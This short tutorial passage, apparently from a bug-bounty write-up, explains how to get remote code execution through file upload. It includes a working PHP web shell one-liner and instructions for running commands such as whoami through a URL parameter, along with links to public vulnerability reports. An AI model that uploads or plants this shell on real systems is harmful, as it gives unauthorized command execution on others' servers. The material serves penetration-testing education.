RCE Via File Upload

One of the most interesting attacks that come into mind whenever there is a file upload functionality is Remote Code Execution. There are several ways to execute a code execution with malicious files, one of the most common is to upload a shell and gain further access.

PHP Shell For RCE:

Try Uploading this code with .php extension and Try to locate and retrieve the php file from application. In the file url you can add ‘cmd’ parameter where you can enter commands like ‘whoami’.

For example: https://example.com/shell.php?cmd=whoami

 <?php phpinfo();?>
 <?php system($_GET[‘cmd’]);?>

Its will not be this simple in real world application, there will be some restrictions on uploading these php files, We will talk about the file upload bypass techniques below.

Reference:

https://hackerone.com/reports/506646

https://hackerone.com/reports/343726

https://sidblog.medium.com/file-upload-to-rce-7c04b3b252de

https://chris-young.net/2020/04/14/file-upload-to-remote-code-execution/

[Bonus] RCE Via .gif Upload:

https://hackerone.com/reports/135072